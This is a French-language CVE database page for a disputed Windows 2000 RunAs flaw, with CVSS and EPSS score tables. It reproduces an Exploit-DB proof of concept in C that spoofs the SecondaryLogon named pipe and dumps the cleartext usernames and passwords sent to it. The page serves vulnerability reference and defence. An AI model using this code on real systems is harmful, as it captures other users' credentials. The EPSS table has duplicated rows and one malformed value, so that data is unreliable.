CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
RunAs (runas.exe) in Windows 2000 allows local users to create a spoofed named pipe when the service is stopped, then capture cleartext usernames and passwords when clients connect to the service. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
3.6
AV:L/AC:L/Au:N/C:P/I:P/A:N
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
2.58%
–
–
2022-03-20
–
–
2.58%
–
–
2022-04-03
–
–
2.58%
–
–
2022-05-15
–
–
2.58%
–
–
2022-10-16
–
–
2.82%
–
–
2023-03-12
–
–
–
0.04%
–
2023-03-26
–
–
–
0.06%
–
2023-10-29
–
–
–
0.06%
–
2023-11-05
–
–
–
0.12%
–
2023-12-03
–
–
–
0.12%
–
2023-12-10
–
–
–
0.12%
–
2024-02-11
–
–
–
0.04%
–
2024-03-24
–
–
–
0.04%
–
2024-04-21
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2024-07-14
–
–
–
0.04%
–
2024-08-04
–
–
–
0.04%
–
2024-08-11
–
–
–
0.04%
–
2024-09-22
–
–
–
0.18%
–
2024-11-03
–
–
–
0.18%
–
2024-12-22
–
–
–
0.18%
–
2025-01-19
–
–
–
2.29%
–
2025-02-16
–
–
–
2.29%
–
2025-01-19
–
–
–
2.29%
–
2025-02-16
–
–
–
2.29%
–
2025-03-18
–
–
–
–
2.99%
2025-03-30
–
–
–
–
2.63%
2025-04-15
–
–
–
–
2.63%
2025-04-15
–
–
–
–
2.63,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2001-12-10 23h00 +00:00 Auteur : Camisade EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/3185/info
The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the shift key and right mouse clicking on an icon, then selecting 'Run as...' from the context menu.
When the RunAs service is invoked, it creates a named pipe for client for communication of credentials (in cleartext).
If the RunAs service is stopped, the attacker can create a named pipe with the same name to which credentials will be communicated when another user tries to use 'RunAs'.
// radix1112200101.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.
#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#define MAX_IN_BUF 0x1000
#define MAX_OUT_BUF 0x4
#define MAX_INST 0xA
#define SECONDARY_LOGON_PIPE _T("\\\\.\\pipe\\SecondaryLogon")
void main()
{
HANDLE hPipe;
hPipe = CreateNamedPipe(SECONDARY_LOGON_PIPE, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_BYTE|PIPE_WAIT, MAX_INST, MAX_OUT_BUF, MAX_IN_BUF,
NMPWAIT_USE_DEFAULT_WAIT, 0);
if (hPipe == INVALID_HANDLE_VALUE)
{
printf("Can't create secondary logon pipe. Error %d\n", GetLastError());
return;
}
printf("Created pipe and waiting for clients...\n");
if (ConnectNamedPipe(hPipe, 0))
{
UCHAR InBuf[MAX_IN_BUF];
DWORD dwReadCount;
while (ReadFile(hPipe, InBuf, MAX_IN_BUF, &dwReadCount, 0))
{
printf("Read %d bytes. (ASCII Dump)\n", dwReadCount);
DWORD dwPos;
for (dwPos = 0; dwPos < dwReadCount; dwPos++)
{
printf("%c ", InBuf[dwPos]);
if ((dwPos % 16) == 0)
printf("\n");
}
DWORD dwReply = ERROR_ACCESS_DENIED;
DWORD dwWroteCount;
WriteFile(hPipe, &dwReply, sizeof(DWORD), &dwWroteCount, 0);
}
}
DisconnectNamedPipe(hPipe);
CloseHandle(hPipe);
}